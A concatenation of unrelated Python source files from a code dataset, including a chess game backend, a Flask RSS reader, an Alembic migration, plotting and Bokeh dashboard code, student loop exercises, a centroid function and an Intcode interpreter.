Initialize the board array that holds every chess piece\n # Args: None\n # Returns: None\n #\n def initBoard(self):\n self.board = [\n NoPiece(1, 1),\n NoPiece(1, 2),\n NoPiece(1, 3),\n NoPiece(1, 4),\n NoPiece(1, 5),\n NoPiece(1, 6),\n NoPiece(1, 7),\n NoPiece(1, 8),\n NoPiece(2, 1),\n NoPiece(2, 2),\n NoPiece(2, 3),\n Pawn(0, 2, 4),\n NoPiece(2, 5),\n NoPiece(2, 6),\n NoPiece(2, 7),\n NoPiece(2, 8),\n NoPiece(3, 1),\n NoPiece(3, 2),\n NoPiece(3, 3),\n NoPiece(3, 4),\n NoPiece(3, 5),\n NoPiece(3, 6),\n King(1, 3, 7),\n NoPiece(3, 8),\n NoPiece(4, 1),\n NoPiece(4, 2),\n NoPiece(4, 3),\n NoPiece(4, 4),\n NoPiece(4, 5),\n NoPiece(4, 6),\n NoPiece(4, 7),\n NoPiece(4, 8),\n NoPiece(5, 1),\n NoPiece(5, 2),\n NoPiece(5, 3),\n NoPiece(5, 4),\n NoPiece(5, 5),\n NoPiece(5, 6),\n NoPiece(5, 7),\n Knight(0, 5, 8),\n NoPiece(6, 1),\n NoPiece(6, 2),\n NoPiece(6, 3),\n NoPiece(6, 4),\n NoPiece(6, 5),\n NoPiece(6, 6),\n NoPiece(6, 7),\n Bishop(1, 6, 8),\n NoPiece(7, 1),\n NoPiece(7, 2),\n NoPiece(7, 3),\n NoPiece(7, 4),\n NoPiece(7, 5),\n NoPiece(7, 6),\n NoPiece(7, 7),\n NoPiece(7, 8),\n NoPiece(8, 1),\n NoPiece(8, 2),\n NoPiece(8, 3),\n NoPiece(8, 4),\n NoPiece(8, 5),\n NoPiece(8, 6),\n NoPiece(8, 7),\n NoPiece(8, 8)\n ]\n\n #\n # DONE\n # Return the array holding all the chess pieces\n # Args: None\n # Returns: an array containing the pieces\n #\n def getBoard(self):\n return self.board\n\n #\n # Update the piece array after a move\n # Args: the move to apply (old and new coordinates plus piece id)\n # Returns: None\n #\n def updateBoard(self, move):\n oldPieceIndex = self.getPieceIndex(move['oldX'], move['oldY'])\n oldPiece = self.board[oldPieceIndex]\n Logger.log(oldPiece.__name__)\n tempBoard = self.board\n for i in range(len(self.board)):\n if self.board[i].x == move['x'] and self.board[i].y == move['y']:\n if isinstance(self.board[oldPieceIndex], Pawn):\n self.board[i] = Pawn(move['id'], move['x'], move['y'])\n self.board[oldPieceIndex] = NoPiece(move['oldX'], move['oldY'])\n \n \n #\n # DONE\n # Can a player join the game?\n # Args: None\n # Returns: True if it is possible, False otherwise\n #\n def playerCanJoin(self):\n if self.players < 2:\n return True\n else:\n return False\n #\n # DONE\n # Add a player to the game\n # Args: None\n # Returns: None\n #\n def join(self):\n self.players += 1\n if self.players == 2:\n self.ready = True\n self.initBoard()\n\n #\n # DONE\n # Is the square occupied? \n # Args: x coordinate, y coordinate\n # Returns: index of the square if it holds no piece, True otherwise\n #\n def isSpaceOccupied(self, x, y):\n for i in range(len(self.board)):\n if self.board[i].x == x and self.board[i].y == y:\n if isinstance(self.board[i], NoPiece):\n return i\n else:\n return True\n \n \n #\n # DONE\n # Return the index of a piece from its x and y\n # Args: x, y of the piece\n # Returns: index of the piece if it is in the array, False otherwise \n #\n def getPieceIndex(self, x, y):\n for i in range(len(self.board)):\n if self.board[i].x == x and self.board[i].y == y:\n return i\n return False\n \n #\n # TODO\n # Handles moving the pieces on the board \n # Args: move (JSON?) unfinished, so not sure yet\n # Returns: not decided yet (unfinished)\n #\n def doMove(self, move):\n #Logger.log(move)\n r = self.isSpaceOccupied(move['x'], move['y'])\n if r is True:\n return 'space taken'\n elif isinstance(r, int):\n self.updateBoard(move)\n #\n # DONE\n # Return a JSON representation of the array holding the pieces\n # Args: None\n # Returns: the array of pieces plus whose turn it is\n #\n def getState(self):\n resData = {}\n tempBoard = self.board\n for i in range(len(tempBoard)):\n if type(tempBoard[i]) is not str and type(tempBoard[i]) is not list:\n tempBoard[i] = [tempBoard[i].__name__, tempBoard[i].joueur]\n \n resData['board'] = tempBoard\n resData['playerTurn'] = self.playerTurn\n resData['ready'] = self.ready\n return resData\n \n \n \n \n ","sub_path":"Backend/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292900280","text":"from flask import Flask\nfrom flask import render_template\nimport feedparser\n\napp = Flask(__name__)\n\nRSS_FEED = {'bbc': \"http://feeds.bbci.co.uk/news/rss.xml\", 'cnn' : \"http://rss.cnn.com/rss/edition.rss\", 'fox':\"http://feeds.foxnews.com/foxnews/lastest\", 'iol':\"http://rss.iol.io/iol/news\"}\n\n@app.route(\"/\")\n@app.route(\"/<publication>\")\n\ndef get_news(publication=\"bbc\"):\n feed = feedparser.parse(RSS_FEED[publication])\n return render_template(\"home.html\", articles = feed['entries'] )\n\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n\n","sub_path":"Python/Flask/Project1/dynamic_news.py","file_name":"dynamic_news.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146761344","text":"\"\"\"Initial\n\nRevision ID: 94fe22e29d3b\nRevises: \nCreate Date: 2018-06-06 17:04:23.868383\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '94fe22e29d3b'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('activo',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('ticker', sa.String(length=64), nullable=True),\n sa.Column('nombre', sa.String(length=64), nullable=True),\n sa.Column('tipo', sa.Integer(), nullable=True),\n sa.Column('url', sa.String(length=256), nullable=True),\n sa.Column('moneda', sa.String(length=3), nullable=True),\n sa.Column('descargar', sa.Boolean(), nullable=True),\n sa.Column('clase', sa.String(length=1), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('nombre'),\n sa.UniqueConstraint('ticker')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_timestamp'), 'user', ['timestamp'], unique=False)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('cotizacion',\n sa.Column('activo_id', sa.Integer(), nullable=False),\n sa.Column('fecha', sa.DateTime(), nullable=False),\n sa.Column('VL', sa.Float(), nullable=True),\n sa.ForeignKeyConstraint(['activo_id'], ['activo.id'], ),\n sa.PrimaryKeyConstraint('activo_id', 'fecha')\n )\n op.create_table('movimiento_activo',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('fecha', sa.DateTime(), nullable=True),\n sa.Column('unidades', sa.Float(), nullable=True),\n sa.Column('precio', sa.Float(), nullable=True),\n sa.Column('activo_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['activo_id'], ['activo.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('movimiento_activo')\n op.drop_table('cotizacion')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_timestamp'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n op.drop_table('activo')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/94fe22e29d3b_initial.py","file_name":"94fe22e29d3b_initial.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204983549","text":"#Contour is nothing but the outlines or shape of something.\n#Contour plots are isolines to represent the graphical 3-D surface by \n#plotting the Z slices. Simply we can say that Contour plots can be used to \n#show 3-Dimensional surfaces on a 2-Dimensional plane.\n\n#------Syntax-----------\n#To create a contour plot of an array Z. 
The level values are taken automatically by itself.\n#contour(Z)\n\n#To create a contour plot using the coordinates X, Y specify the (x, y) coordinates of the surface.\n#contour(X,Y,Z)\n\n#To contour up to N automatically-chosen levels.\n#contour(Z,N)\n#contour(X,Y,Z,N)\n\n#To draw contour lines at specified values in sequence V in increasing order.\n#contour(Z,V)\n#contour(X,Y,Z,V)\n\n#To fill the len(V)-1 regions between the values in V in increasing order.\n#contourf(..., V)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x, y):\n return (1 + x*2+ x *1 + y * 3) * np.exp(-x ** 2 -y ** 2)\n\nn = 0.01\n\nx = np.arange(-3.0, 3.0, n)\ny = np.arange(-2.0, 2.0, n)\nX, Y = np.meshgrid(x, y)\nX\nY\n\n\nplt.contourf(X, Y, f(X, Y), 8, alpha=.5, cmap='jet')\nC = plt.contour(X, Y, f(X, Y), 8, colors='black')\n\nplt.clabel(C, inline=1, fontsize=10)\nplt.title('Simple Contour Plot with labels')\n\nplt.show()\n\n#When we want to plot the numpy arrays which consists some data as \n#images can be rendered using the function called imshow().\n\nplt.imshow(f(X, Y))\n","sub_path":"Class/Contour Plot.py","file_name":"Contour Plot.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111445580","text":"import logging\n\nfrom fastapi import APIRouter, Body\nfrom starlette.responses import Response\n\nfrom service.native_form_service import form_template_service, form_posting_service, check_native_health\n\nnative_form_router = APIRouter()\n\n\n@native_form_router.get(\"/native/health\", tags=[\"native\", \"health\"])\ndef health():\n return check_native_health()\n\n\n@native_form_router.get(\"/native/form/{id}\", tags=[\"form\", \"native\"])\ndef get_form_by_id(id: str, response: Response):\n response.headers[\"Content-Type\"] = \"application/json\"\n return form_template_service(id).to_dict()\n\n\n@native_form_router.post(\"/native/form\", tags=[\"form\", \"native\"], status_code=201)\nasync def post_form_by_number(body=Body(...), response=Response):\n logging.info(f\"Body: {body}\")\n return await form_posting_service(json_body=body)","sub_path":"controller/native_form_controller.py","file_name":"native_form_controller.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"521614978","text":"# -*- coding: utf-8 -*-\n# import os\nimport numpy as np\nimport pandas as pd\n# import glob\n# import geopandas as gpd\n# import json\n# from bokeh.io import output_notebook, output_file\n# from bokeh.io import show\nfrom bokeh.plotting import figure\n# from bokeh.models import GeoJSONDataSource,LinearColorMapper,ColorBar\nfrom bokeh.models import ColumnDataSource,Panel#,FactorRange\nfrom bokeh.palettes import Category10#,brewer, Category20, Viridis256\n# from bokeh.models import FixedTicker,NumeralTickFormatter,HoverTool\n# from bokeh.plotting import show as show_inline\nfrom bokeh.models.widgets import RadioButtonGroup, Div\nfrom bokeh.layouts import column,WidgetBox#,row,widgetbox\n# from bokeh.io import curdoc\nimport situ_fn\n###############################################################################\ndef get_graph_data(df_all_n,agg,df_goal,candidates_data,gs_name,source_set,\n train_dates,test_dates,old_to_new_regions,old_to_new_sources):\n # Get data of chosen gold standard and source set\n results = df_all_n.loc[:,(df_all_n.loc['Region'] == gs_name[:-3]) & \\\n (df_all_n.loc['SourcesSet'] == source_set) & 
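# --- Added illustration of the contour(Z, V) / contourf(..., V) forms that the
# --- contour-plot notes above describe: V pins the contour lines to exact level
# --- values, given in increasing order, instead of N automatic levels.
import numpy as np
import matplotlib.pyplot as plt

xx, yy = np.meshgrid(np.linspace(-3, 3, 200), np.linspace(-2, 2, 200))
zz = (1 + xx * 2 + xx * 1 + yy * 3) * np.exp(-xx ** 2 - yy ** 2)

V = [-2, -1, 0, 1, 2]                # draw/fill at exactly these level values
plt.contourf(xx, yy, zz, V)          # fills the len(V)-1 regions between them
C = plt.contour(xx, yy, zz, V, colors='black')
plt.clabel(C, inline=1, fontsize=8)
plt.colorbar()
plt.show()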
\\\n (df_all_n.loc['Column'] == 'id')].iloc[:,0]\n predictors_list = results.loc[results.index.isin(\\\n [np.str(i) for i in range(pd.notnull(results).sum()-4)])].values.tolist()\n predictors_list = [x.replace('_','-') for x in predictors_list]\n predictors_ts = candidates_data[source_set].loc[:,predictors_list]\n gs_ts = df_goal.loc[:,[gs_name]]\n \n \n ## Split between training and testing data, do regression\n # Split data\n X_train = predictors_ts.loc[train_dates[0]:train_dates[1]]\n X_test = predictors_ts.loc[test_dates[0]:test_dates[1]]\n y_train = gs_ts.loc[train_dates[0]:train_dates[1]]\n y_test = gs_ts.loc[test_dates[0]:test_dates[1]]\n dates_train = y_train.index.tolist()\n dates_test = y_test.index.tolist()\n \n # Do regression, forecast in and out of sample\n OOS_coef = situ_fn.lin_reg(y_train,X_train,lin_reg_intercept=True)\n in_sample_forecast_ts = situ_fn.lin_pred(X_train, OOS_coef)\n OOS_forecast_ts = situ_fn.lin_pred(X_test, OOS_coef)\n # in_sample_forecast_df = pd.DataFrame({'Date':dates_train,\n # 'InSample':in_sample_forecast_ts})\n # in_sample_forecast_df.set_index('Date',inplace=True)\n # OOS_forecast_df = pd.DataFrame({'Date':dates_test,'OOS':OOS_forecast_ts})\n # OOS_forecast_df.set_index('Date',inplace=True)\n \n # Compure R squared\n # r_squared_in_sample = situ_fn.R_squared_quick(np.array(y_train.iloc[:,0]),\n # in_sample_forecast_ts)\n # r_squared_OOS = situ_fn.R_squared_quick(np.array(y_test.iloc[:,0]),OOS_forecast_ts)\n agg_gs_source = agg.loc[(agg.Region == old_to_new_regions[gs_name[:-3]]) & \\\n (agg.SourcesSet == old_to_new_sources[source_set])]\n r_squared_in_sample = agg_gs_source.loc[\\\n agg_gs_source.ScoreType == 'InSample','Value'].iloc[0]\n r_squared_OOS = agg_gs_source.loc[agg_gs_source.ScoreType == 'OOS','Value'].iloc[0]\n \n return dates_train, dates_test, gs_ts,in_sample_forecast_ts,OOS_forecast_ts,\\\n r_squared_in_sample, r_squared_OOS\n###############################################################################\ndef fit_tab(agg_all_nfolds,df_all_nfolds,df_goal,candidates_data,train_dates,\n test_dates,old_to_new_sources,new_to_old_sources,old_to_new_regions,\n n_folds_list):\n ## Get region names and list of n_folds values\n region_names_new = list(old_to_new_regions.values())\n region_names_new.sort()\n n_folds_display = [np.str(x) for x in n_folds_list]\n \n ## Pick gold standard, data source and n_folds values to start with\n gs_name = 'AMAZONAS-VE'\n source_set_data = 'Best'\n n_folds_fit = n_folds_list[0]\n agg_n = agg_all_nfolds.loc[agg_all_nfolds.NbFolds == n_folds_fit,:]\n df_all_n = df_all_nfolds.loc[:,df_all_nfolds.loc['NbFolds'] == np.str(n_folds_fit)]\n if source_set_data == 'Best':\n agg_source_best = agg_n.loc[(agg_n.Region == old_to_new_regions[gs_name[:-3]]),\n 'BestSource'].values[0]\n source_set_data = new_to_old_sources[agg_source_best]\n \n dates_train, dates_test, gs_ts,in_sample_forecast_ts,OOS_forecast_ts,\\\n r_squared_in_sample, r_squared_OOS = get_graph_data(\\\n df_all_n,agg_n,df_goal,candidates_data,gs_name,source_set_data,\n train_dates,test_dates,old_to_new_regions,old_to_new_sources)\n \n ### Create Bokeh graph\n all_dates = pd.to_datetime(gs_ts.index.tolist())\n dates_train_plot = pd.to_datetime(dates_train)\n dates_test_plot = pd.to_datetime(dates_test)\n #xs = [dates_train,dates_test,dates_train,dates_test]\n # min_y = [np.max(np.concatenate((np.array(gs_ts.T)[0],in_sample_forecast_ts,OOS_forecast_ts),axis=0))]\n # max_y = 
[np.min(np.concatenate((np.array(gs_ts.T)[0],in_sample_forecast_ts,OOS_forecast_ts),axis=0))]\n min_y,max_y = [np.min(np.array(gs_ts.T)[0])],[np.max(np.array(gs_ts.T)[0])]\n xs = [all_dates,dates_train_plot,dates_test_plot,all_dates[:1],all_dates[:1]]\n ys = [np.array(gs_ts),in_sample_forecast_ts,OOS_forecast_ts,min_y,max_y]\n source = ColumnDataSource(data=dict(\n x = xs,\n y = ys,\n color = (Category10[3])[0:len(xs)] +['#ffffff','#ffffff'],\n group = ['Gold Standard','Forecast In Sample','Forecast OOS','','']))\n TOOLS=\"pan,wheel_zoom,box_zoom,reset,hover,save\"\n p_ts = figure(plot_width=1000, plot_height=500,x_axis_type='datetime',\n title='', tools=TOOLS,)\n p_ts.multi_line(\n xs='x',\n ys='y',\n legend='group',\n source=source,\n line_color='color')\n \n p_ts.legend.location = (0,350)\n \n ## Radio buttons\n # Define buttons\n sourceset_display = ['Best'] + list(new_to_old_sources.keys())[1:]\n #sourceset_display = ['Best'] + sourceset_names_old[1:]\n n_folds_button = RadioButtonGroup(labels=n_folds_display, active=0)\n source_set_button_plot = RadioButtonGroup(labels=sourceset_display, active=0)\n regions_button_plt = RadioButtonGroup(labels=region_names_new, active=0)\n \n # Text above graph\n div_text = 'In and Out of Sample fit
    Gold Standard: ' + \\\n                old_to_new_regions[gs_name[:-3]] + '    Predictor Set: ' + \\\n                old_to_new_sources[source_set_data] + '
    ' + \\\n 'In Sample R2: ' + np.str(np.round(r_squared_in_sample,2)) + \\\n ' - ' + 'Out of Sample R2: ' + np.str(np.round(r_squared_OOS,2))\n div = Div(text=div_text,width=700, height=100)\n \n ###########################################################################\n # Update function\n def plot_callback(attr, old, new):\n # Get new selected value\n n_folds_fit = np.int(n_folds_display[n_folds_button.active])\n agg_n = agg_all_nfolds.loc[agg_all_nfolds.NbFolds == n_folds_fit,:]\n df_all_n = df_all_nfolds.loc[:,df_all_nfolds.loc['NbFolds'] == np.str(n_folds_fit)]\n \n gs_name_selected = region_names_new[regions_button_plt.active]\n if gs_name_selected == 'Distrito Federal':\n gs_name = 'DTTOMETRO-VE'\n else:\n gs_name = gs_name_selected.replace(' ','').upper() + '-VE'\n \n source_set = sourceset_display[source_set_button_plot.active]\n if source_set == 'Best':\n source_set_data = source_set\n agg_source_best = agg_n.loc[(agg_n.Region == old_to_new_regions[gs_name[:-3]]),\n 'BestSource'].values[0]\n source_set_data = new_to_old_sources[agg_source_best]\n else:\n source_set_data = new_to_old_sources[source_set]\n \n # Get data to update graph\n dates_train, dates_test, gs_ts,in_sample_forecast_ts,OOS_forecast_ts,\\\n r_squared_in_sample, r_squared_OOS = get_graph_data(\\\n df_all_n,agg_n,df_goal,candidates_data,gs_name,source_set_data,\n train_dates,test_dates,old_to_new_regions,old_to_new_sources)\n \n ### Create Bokeh graph\n all_dates = pd.to_datetime(gs_ts.index.tolist())\n dates_train_plot = pd.to_datetime(dates_train)\n dates_test_plot = pd.to_datetime(dates_test)\n #xs = [dates_train,dates_test,dates_train,dates_test]\n min_y,max_y = [np.min(np.array(gs_ts.T)[0])],[np.max(np.array(gs_ts.T)[0])]\n xs = [all_dates,dates_train_plot,dates_test_plot,all_dates[:1],all_dates[:1]]\n ys = [np.array(gs_ts),in_sample_forecast_ts,OOS_forecast_ts,min_y,max_y]\n \n new_source = ColumnDataSource(data=dict(\n x = xs,\n y = ys,\n color = (Category10[3])[0:len(xs)] +['#ffffff','#ffffff'],\n group = ['Gold Standard','Forecast In Sample','Forecast OOS','','']))\n source.data = new_source.data\n \n new_text = 'In and Out of Sample fit
    Gold Standard: ' + \\\n                old_to_new_regions[gs_name[:-3]] + ' - Predictor Set: ' + \\\n                source_set + '    ' + \\\n                'In Sample R2: ' + np.str(np.round(r_squared_in_sample,2)) + \\\n                '
    Out of Sample R2: ' + np.str(np.round(r_squared_OOS,2))\n div.text = new_text\n return\n ###########################################################################\n \n n_folds_button.on_change('active', plot_callback)\n source_set_button_plot.on_change('active', plot_callback)\n regions_button_plt.on_change('active', plot_callback)\n \n # Put controls in a single element\n controls = WidgetBox(n_folds_button,regions_button_plt,source_set_button_plot)\n\t\n\t# Create a row layout\n layout = column(controls,div,p_ts)\n\t\n\t# Make a tab with the layout\n tab = Panel(child=layout, title = 'Regression Fit')\n \n return tab\n # To run from Spyder (radio buttons won't work)\n # output_file('foo.html')\n # show(column(regions_button_plt,source_set_button_plot,div,p_ts),browser=\"chrome\")\n \n # To run from command (in the folder of the file) using the command\n # bokeh serve --show visu_ts.py\n # curdoc().add_root(column(regions_button_plt,source_set_button_plot,div,p_ts))\n # curdoc().title = \"Venezuela Situational Awareness\"\n###############################################################################\n\n","sub_path":"visu_tab_fit.py","file_name":"visu_tab_fit.py","file_ext":"py","file_size_in_byte":10465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270555048","text":"import bpy\nfrom .. import problems\nfrom .. preferences import getPreferences\nfrom .. utils.blender_ui import iterAreas\nfrom .. utils.nodes import getAnimationNodeTrees\n\ndef iterAutoExecutionNodeTrees(events):\n if not problems.canExecute(): return\n for nodeTree in getAnimationNodeTrees():\n if nodeTree.canAutoExecute(events):\n yield nodeTree\n\ndef executeNodeTrees(nodeTrees):\n for nodeTree in nodeTrees:\n nodeTree.autoExecute()\n\ndef afterExecution():\n prefs = getPreferences()\n if prefs.sceneUpdateAfterAutoExecution:\n for scene in set(tree.scene for tree in getAnimationNodeTrees()):\n scene.update()\n\n from .. events import isRendering\n if prefs.redrawAllAfterAutoExecution and not isRendering():\n redrawAll()\n\ndef redrawAll():\n for area in iterAreas():\n area.tag_redraw()\n","sub_path":"execution/auto_execution.py","file_name":"auto_execution.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406167397","text":"#\n# hw6pr5.py - Intro to loops!\n#\n# Name: Xichen Lin\n# This is the CS5 gold intro-to-loops file\n#\n\n#\n# Example loop-based factorial!\n#\ndef fac(n):\n \"\"\" loop-based factorial function\n input: a nonnegative integer n\n output: the factorial of n\n \"\"\"\n result = 1 # starting value - like a base case\n for x in range(1,n+1): # loop from 1 to n, inclusive\n result = result * x # update the result by mult. 
by x\n    return result               # notice this is AFTER the loop!\n\n\n#\n# tests for factorial\n#\n\nprint(\"fac(0): should be 1 ==\", fac(0))\nprint(\"fac(5): should be 120 ==\", fac(5))\n\ndef power(b,p):\n    result = 1\n    for x in range(1,p+1):\n        result = result * b\n    return result\n\nprint(\"power(2,5): should be 32 ==\", power(2,5))\nprint(\"power(5,2): should be 25 ==\", power(5,2))\nprint(\"power(42,0): should be 1 ==\", power(42,0))\nprint(\"power(0,42): should be 0 ==\", power(0,42))\nprint(\"power(0,0): should be 1 ==\", power(0,0))\n\ndef summedOdds(L):\n    sum = 0\n    for x in L:\n        if x/2 != x//2:\n            sum = sum + x\n    return sum\n\n\nprint(\"summedOdds( [4,5,6] ): should be 5 ==\", summedOdds( [4,5,6] ))\nprint(\"summedOdds( range(3,10) ): should be 24 ==\", summedOdds( list(range(3,10)) ))\n\nimport random   # needed by countGuesses and untilARepeat below\n\ndef countGuesses( hidden ):\n    \"\"\" uses a while loop to guess hidden, from 0 to 99\n        input: hidden, a \"hidden\" integer from 0 to 99\n        output: the number of guesses needed to guess hidden\n    \"\"\"\n    guess = random.choice( range(0,100) )  # 0 to 99, inclusive\n    numguesses = 1                         # we just made one guess, above\n    while guess != hidden:\n        guess = random.choice( range(0,100) )   # guess again!\n        numguesses += 1                         # add one to our number of guesses\n    return numguesses\n\ndef unique( L ):\n    \"\"\" returns whether all elements in L are unique\n        input: L, a list of any elements\n        output: True, if all elements in L are unique,\n                or False, if there is any repeated element\n    \"\"\"\n    if len(L) == 0:\n        return True\n    elif L[0] in L[1:]:\n        return False\n    else:\n        return unique( L[1:] )   # recursion is OK, too!\n\ndef untilARepeat( high ):\n    L = []\n    guess = random.choice( range(0, high ) )  # 0 to high-1, inclusive\n    numguesses = 1                            # we just made one guess, above\n    while unique(L):\n        guess = random.choice( range(0, high ) )\n        L = L + [guess]   # guess again!\n        numguesses += 1   # add one to our number of guesses\n    return numguesses\n\n\n#\n# Below, write the other functions using loops:\n#     power(b,p)           # the hw provides tests...\n#     summedOdds(L)        # the hw provides tests...\n#     untilARepeat(high)   # try it! 
(randomness prevents usual testing)\n#\n","sub_path":"cs5/hw7/hw6pr5.py","file_name":"hw6pr5.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"309921677","text":"from geo import us_states, geo_distance, make_position, longitude, latitude\n\ndef find_centroid(polygon):\n\t\"\"\"\n\t>>> p1, p2, p3 = make_position(1, 2), make_position(3, 4), make_position(5, 0)\n\t>>> triangle = [p1, p2, p3, p1] # First vertex is also the last vertex\n\t>>> round5 = lambda x: round(x, 5) # Rounds floats to 5 digits\n\t>>> tuple(map(round5, find_centroid(triangle)))\n\t(3.0, 2.0, 6.0)\n\t>>> tuple(map(round5, find_centroid([p1, p3, p2, p1])))\n\t(3.0, 2.0, 6.0)\n\t>>> tuple(map(float, find_centroid([p1, p2, p1]))) # A zero-area polygon\n\t(1.0, 2.0, 0.0)\n\t\"\"\"\n\tarea, cx, cy = 0,0,0\n\tfor i in range(len(polygon)-1):\n\t\tx_i = latitude(polygon[i])\n\t\ty_i = longitude(polygon[i])\n\t\tx_i1 = latitude(polygon[i+1])\n\t\ty_i1 = longitude(polygon[i+1])\n\t\tarea = area + .5*((x_i)*(y_i1)-(x_i1)*(y_i))\n\t\tcx = cx + (x_i+x_i1)*(x_i*y_i1-x_i1*y_i)\n\t\tcy = cy + (y_i+y_i1)*(x_i*y_i1-x_i1*y_i)\n\tif area == 0:\n\t\treturn latitude(polygon[0]), longitude(polygon[0]), area\n\treturn cx/ (6*area), cy/(6*area), abs(area)\n","sub_path":"projects/Project2/find_centroid.py","file_name":"find_centroid.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20208275","text":"import sys\nimport time\nimport termcolor\nfrom collections import defaultdict, namedtuple\nimport aoc\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n\ndef inp_decode(x):\n return list(map(int, x.split(\",\")))\n\ninp = aoc.get_input(inp_decode)\n_logger = aoc.get_logger()\n\nopcode = namedtuple(\"opcode\", [\"name\", \"parameter\"])\nopcodes = {\n 1: opcode(name=\"add\", parameter=\"iio\"),\n 2: opcode(name=\"mul\", parameter=\"iio\"),\n 3: opcode(name=\"inp\", parameter=\"o\"),\n 4: opcode(name=\"out\", parameter=\"i\"),\n 5: opcode(name=\"jit\", parameter=\"ii\"),\n 6: opcode(name=\"jif\", parameter=\"ii\"),\n 7: opcode(name=\"lt \", parameter=\"iio\"),\n 8: opcode(name=\"eq \", parameter=\"iio\"),\n 9: opcode(name=\"arb\", parameter=\"i\"),\n 99: opcode(name=\"hlt\", parameter=\"\"),\n}\n\n\nclass disassembler(object):\n def disassemble(self, prog):\n pos = 0\n commands = []\n while pos < len(prog):\n assemblerline = [f\"[{pos:< 5}]\"]\n commandcode = prog[pos] % 100\n try:\n assemblerline.append(opcodes[commandcode].name)\n for pindex, param in enumerate(opcodes[commandcode].parameter, start=1):\n encoding = (prog[pos] // pow(10, pindex + 1)) % 10\n modes = {0: \"*\", 1: \"\", 2: \"@\"}\n pv = prog[pos + pindex]\n assemblerline.append(f\"{modes[encoding]}{pv}\")\n pos += len(opcodes[commandcode].parameter) + 1\n except:\n assemblerline.append(\"XXX\")\n pos += 1\n finally:\n commands.append(\n \" \".join(map(lambda x: \"{0:>10}\".format(x), assemblerline))\n )\n return commands\n\nclass p2(object):\n def __init__(self):\n self.hardreset()\n self.processed_steps = []\n\n def hardreset(self):\n self.tinput = []\n self.mem = defaultdict(lambda: [{\"r\": 0, \"v\": 0, \"e\": 0, \"w\": {}}])\n self.reset()\n\n def reset(self):\n self.halt = False\n self.tinput_pos = 0\n self.output = []\n self.relativebase = [0]\n self.ip = 0\n self.steps = 0\n\n def set_prog(self, prog):\n for i, f in 
enumerate(prog):\n self.mem[i] = [{\"v\": f, \"r\": 0, \"e\": 0, \"w\": {}}]\n\n def add_input(self, inp):\n self.tinput.append(inp)\n\n def fetch_and_decode(self):\n opcode = self.read(self.ip, execute=True)\n params = [opcode % 100]\n self.decodeinfo = {\"ip\": self.ip, \"opcode\": opcode}\n for pindex, param in enumerate(opcodes[params[0]].parameter, start=1):\n encoding = (opcode // pow(10, pindex + 1)) % 10\n val = self.read(self.ip + pindex)\n if encoding == 2:\n val += self.relativebase[-1]\n self.decodeinfo[pindex] = {\n \"position\": self.ip + pindex,\n \"value\": val,\n \"mode\": encoding,\n \"paramtype\": param,\n }\n if param == \"i\":\n if encoding == 0 or encoding == 2:\n val = self.read(val)\n self.decodeinfo[pindex][\"decoded\"] = val\n params.append(val)\n return params\n\n def step(self):\n self.steps += 1\n fetched = self.fetch_and_decode()\n commandcode = fetched[0]\n params = fetched[1:]\n getattr(self, f\"opcode{commandcode:02d}\")(params)\n self.processed_steps.append(\n {\n \"decodinginfo\": self.decodeinfo,\n \"opcode\": commandcode,\n \"ip\": self.ip,\n \"params\": params,\n }\n )\n\n def run(self):\n self._processing = True\n while self._processing:\n self.step()\n\n def write(self, pos, value):\n self.mem[pos].append({\"v\": value, \"r\": 0, \"e\": 0, \"w\": self.decodeinfo})\n return self.mem[pos][-1][\"v\"]\n\n def read(self, pos, execute=False):\n if execute:\n self.mem[pos][-1][\"e\"] += 1\n self.mem[pos][-1][\"r\"] += 1\n return self.mem[pos][-1][\"v\"]\n\n def 